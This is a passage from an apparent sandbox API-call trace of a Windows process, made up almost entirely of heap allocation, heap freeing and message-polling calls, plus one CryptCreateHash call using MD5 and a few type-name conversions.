dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0136.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0136.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0136.856] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0136.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0136.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0136.856] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0136.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0136.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0136.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0136.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0136.856] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0136.856] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0136.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0136.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0136.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0136.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0136.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0136.856] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0136.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0136.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0136.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0136.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0136.856] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0136.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0136.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0136.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0136.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0136.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0136.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0136.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0136.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0136.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0136.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0136.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0136.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0136.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0136.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0136.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0136.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0136.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0136.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0136.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0136.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0136.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0136.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0136.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0136.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0136.857] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0136.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0136.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0136.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a10 [0136.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0136.857] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0136.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0136.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0136.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0136.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0136.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0136.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0136.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0136.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0136.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0136.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0136.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0136.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0136.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0136.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0136.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0136.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0136.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0136.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0136.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0136.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0136.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0136.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0136.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0136.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0136.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0136.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0136.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0136.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0136.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0136.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0136.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0136.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0136.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0136.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0136.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0136.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0136.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0136.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0136.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0136.917] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0136.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0136.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0136.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0136.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0136.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0136.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0136.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0136.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0136.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0136.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0136.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0136.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0136.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0136.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0136.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0136.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0136.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0136.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0136.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0136.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0136.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0136.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0136.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0136.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0136.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0136.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0136.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0136.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0136.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0136.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0136.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0136.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0136.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0136.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0136.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0136.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0136.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0136.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0136.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50b90, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0136.919] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0136.919] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0136.919] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0136.919] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0136.919] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0136.919] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0136.919] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0136.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0136.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0136.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0136.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0136.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0136.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0136.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0136.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0136.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0136.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0136.919] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0136.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0136.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0136.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0136.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0136.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0136.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0136.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0136.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0136.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0136.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0136.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0136.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0136.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0136.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0136.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0136.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0136.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0136.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0136.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0136.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0136.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54db8 [0136.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0136.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0136.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0136.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0136.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ef8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0136.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0136.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0136.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0136.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0136.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0136.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0136.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0136.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0136.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0136.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0136.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0136.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0136.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0136.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0136.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0136.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0136.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0136.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0136.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0136.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0136.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0136.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0136.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0136.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0136.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0136.921] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0136.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0136.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0136.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0136.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0136.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0136.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0136.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0136.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0136.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0136.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0136.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0136.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0136.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0136.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0136.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0136.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0136.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e38 [0136.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0136.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0136.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0136.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0136.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0136.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0136.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0136.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0136.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0136.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0136.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0136.922] RtlAllocateHeap 